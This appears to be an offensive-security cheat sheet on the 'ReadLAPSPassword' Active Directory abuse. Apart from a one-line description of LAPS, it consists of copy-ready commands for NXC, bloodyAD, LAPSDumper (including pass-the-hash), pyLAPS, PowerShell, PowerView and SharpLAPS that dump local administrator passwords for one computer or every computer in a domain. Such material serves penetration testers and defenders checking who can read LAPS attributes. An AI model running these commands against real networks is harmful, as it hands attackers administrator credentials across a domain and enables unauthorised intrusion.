ReadLAPSPassword

Information

LAPS is a Windows feature that automatically manages and backs up the password of a local administrator account on Windows Server AD-joined devices

Exploitation

Linux

NXC

# read the password of all computers
nxc ldap <ip> -u <user> -p <pass> -M laps
# read the password of a specific computer
nxc ldap <ip> -u <user> -p <pass> -M laps -o COMPUTER='DC01$'

bloodyAD

bloodyAD -u <user> -d <domain> -p <pass> --host <ip> get object 'COMPUTER$' --attr ms-Mcs-AdmPwd

LAPSDumper

# basic usage
python laps.py -u <user> -p <pass> -d <domain>
# PtH on specific LDAP server
python laps.py -u <user> -p <hash> -d <domain> -l <fqdn>

pyLAPS

# read the password of all computers
pyLAPS.py --action get -u <user> -d <domain> -p <pass> --dc-ip <ip>
# read the password of a specific computer
pyLAPS.py --action get --computer 'DC01$' -u <user> -d <domain> -p <pass> --dc-ip <ip>

For an example of reading the LAPS password with NXC check Timelapse.

Windows

AD PS

Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'

PowerView

Get-DomainComputer "DC01" -Properties 'cn','ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'

SharpLAPS

SharpLAPS.exe /user:"DOMAIN\User" /pass:"Password" /host:"192.168.1.1"

Resources

LAPSDumper

GitHub - n00py/LAPSDumper: Dumping LAPS from PythonGitHub

pyLAPS

GitHub - p0dalirius/pyLAPS: Python setter/getter for property ms-Mcs-AdmPwd used by LAPS.GitHub

SharpLAPS

GitHub - swisskyrepo/SharpLAPS: Retrieve LAPS password from LDAPGitHub